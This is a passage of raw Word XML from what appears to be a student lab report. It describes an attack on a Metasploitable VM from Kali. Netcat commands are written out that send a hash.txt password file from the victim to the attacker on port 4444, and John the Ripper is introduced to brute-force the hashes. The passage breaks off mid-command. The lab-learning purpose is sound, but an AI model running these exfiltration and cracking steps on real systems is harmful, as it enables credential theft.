          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">:  This tool is one that is used to verify files that have been sent from one secure location to the other.  As an attacker the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool proves very useful if most or some alternatives of such tools fail to perform the same action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27334BC4" w14:textId="77777777" w:rsidR="0069322F" w:rsidRPr="002F3E4E" w:rsidRDefault="0069322F" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550AB780" w14:textId="43D16DAE" w:rsidR="0069322F" w:rsidRPr="002F3E4E" w:rsidRDefault="0069322F" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The image below shows how the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool was used on both the user and the attacker machine to help get the </w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">“hash.txt” </w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C66BE1" w14:textId="77777777" w:rsidR="0069322F" w:rsidRPr="002F3E4E" w:rsidRDefault="0069322F" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374DCD8E" w14:textId="55F2239D" w:rsidR="0069322F" w:rsidRPr="002F3E4E" w:rsidRDefault="0069322F" w:rsidP="007F5568">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="454D2E34" wp14:editId="6FCB0F66">
            <wp:extent cx="5943600" cy="3189605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1779331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31126" name="Picture 1779331126"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">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048D7194" w14:textId="7A19ACBC" w:rsidR="0069322F" w:rsidRPr="002F3E4E" w:rsidRDefault="0069322F" w:rsidP="0069322F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Image_3.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCC5C25" w14:textId="057AB7DE" w:rsidR="0069322F" w:rsidRPr="002F3E4E" w:rsidRDefault="0069322F" w:rsidP="0069322F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The above image shows that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> has started </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> service and it’s ready to listen to </w:t>
      </w:r>
      <w:r w:rsidR="00FD37AA" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">the attacker IP to be able to send the text file from the users end. The tool uses the command </w:t>
      </w:r>
      <w:r w:rsidR="00FD37AA" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FD37AA" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FD37AA" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FD37AA" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FD37AA" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4444 &lt; /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FD37AA" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FD37AA" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/hash.txt”.</w:t>
      </w:r>
      <w:r w:rsidR="00FD37AA" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  The command entails that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FD37AA" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FD37AA" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> is trying to establish a connection to the attacker machine through the stated port number which is “4444” and the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FD37AA" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FD37AA" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>” flag which stands for listen, verbose and port respectively. After a successful service connection, the attacker also uses the same command but slightly different by stating the user IP address in order to receive connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6B264C" w14:textId="77777777" w:rsidR="00FD37AA" w:rsidRPr="002F3E4E" w:rsidRDefault="00FD37AA" w:rsidP="0069322F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9C19A5" w14:textId="02D6A969" w:rsidR="00FD37AA" w:rsidRPr="002F3E4E" w:rsidRDefault="00FD37AA" w:rsidP="0069322F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The image below shows the attacker machine trying to connect to the user machine through the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> connection that is trying to be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792166D5" w14:textId="77777777" w:rsidR="00FD37AA" w:rsidRPr="002F3E4E" w:rsidRDefault="00FD37AA" w:rsidP="0069322F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03001954" w14:textId="4811AFD6" w:rsidR="00FD37AA" w:rsidRPr="002F3E4E" w:rsidRDefault="00FD37AA" w:rsidP="0069322F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="699383F9" wp14:editId="5F38AB1C">
            <wp:extent cx="5943600" cy="3189605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="346844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44371" name="Picture 346844371"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">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26E66236" w14:textId="03D944CA" w:rsidR="00FD37AA" w:rsidRPr="002F3E4E" w:rsidRDefault="00FD37AA" w:rsidP="00FD37AA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Image_4.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CBC0F1" w14:textId="77777777" w:rsidR="00FD37AA" w:rsidRPr="002F3E4E" w:rsidRDefault="00FD37AA" w:rsidP="00FD37AA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B3CD2D0" w14:textId="1EC69AA8" w:rsidR="00FD37AA" w:rsidRPr="002F3E4E" w:rsidRDefault="00FD37AA" w:rsidP="00FD37AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The image above shows that the attacker has also started its </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool and its willing to accept the connection from the user. The command </w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.72.134 4444 &gt; /home/kali/hash.txt</w:t>
      </w:r>
      <w:r w:rsidR="00C720D8" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00C720D8" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">is telling </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C720D8" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C720D8" w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to accept connection from the user machine through its IP address to receive the file to the attacker home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C64B42" w14:textId="77777777" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00FD37AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09641A64" w14:textId="7154D7E8" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00FD37AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">After a successful attempt to retrieve the file the attacker the attacker then copies the file from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> original directory which is </w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“/home/kali”</w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> to his Desktop for easy access. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F8203F" w14:textId="77777777" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00FD37AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C9019BA" w14:textId="237836E8" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00FD37AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The image below shows that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> has successfully accepted connection from the attacker and it has successfully received the file from the user side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A63C45F" w14:textId="77777777" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00FD37AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D912FC" w14:textId="77777777" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00FD37AA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7B6C09" w14:textId="77777777" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00C720D8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C8FCEF8" w14:textId="77777777" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00C720D8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6738199B" w14:textId="78EAFB89" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00C720D8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1890491F" wp14:editId="0164BFAC">
            <wp:simplePos x="914400" y="914400"/>
            <wp:positionH relativeFrom="column">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3189605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="825557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57481" name="Picture 825557481"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">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anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="textWrapping" w:clear="all"/>
        <w:t>Image_5.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C7F9BD" w14:textId="77777777" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00C720D8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="044C6A7F" w14:textId="77777777" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFC1E38" w14:textId="6B87748A" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>The attacker now verifies if the file has successfully been retrieved from the user machine to its original directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E05D78F" w14:textId="6E733BD1" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The image below shows the attacker successfully verifying that the image has been copied or sent to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> home directory. The highlighted text signifies that the attacker has indeed received the </w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“hash.txt”</w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D96484D" w14:textId="77777777" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3795BF99" w14:textId="78FA5163" w:rsidR="00C720D8" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="361143EB" wp14:editId="50AFAF5C">
            <wp:extent cx="5943600" cy="3189605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13247265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26509" name="Picture 1324726509"/>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2A8EF88E" w14:textId="2CF34461" w:rsidR="00FD37AA" w:rsidRPr="002F3E4E" w:rsidRDefault="00C720D8" w:rsidP="00C720D8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Image_6.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D3FCED" w14:textId="2772661A" w:rsidR="008C5885" w:rsidRPr="002F3E4E" w:rsidRDefault="008C5885" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7403628F" w14:textId="77777777" w:rsidR="008C5885" w:rsidRPr="002F3E4E" w:rsidRDefault="008C5885" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478E6A78" w14:textId="77777777" w:rsidR="008C5885" w:rsidRPr="002F3E4E" w:rsidRDefault="008C5885" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="713BB7EB" w14:textId="5AD87215" w:rsidR="008C5885" w:rsidRPr="002F3E4E" w:rsidRDefault="008C5885" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper: This tool is one that is mostly used to crack passwords using their hashes to brute force into critical IT infrastructure systems.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02123933" w14:textId="77777777" w:rsidR="008C5885" w:rsidRPr="002F3E4E" w:rsidRDefault="008C5885" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="107A8156" w14:textId="315FB247" w:rsidR="008C5885" w:rsidRPr="002F3E4E" w:rsidRDefault="008C5885" w:rsidP="00C720D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The attacker after successfully retrieving the hash.txt file it then uses John to perform a brute force attack to crack the password of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> VM.  To do this the attacker used a few switches to be able to successfully simulate its attack.  The command</w:t>
      </w:r>
      <w:r w:rsidRPr="002F3E4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> “john –wordlist=</w:t>
      </w:r>
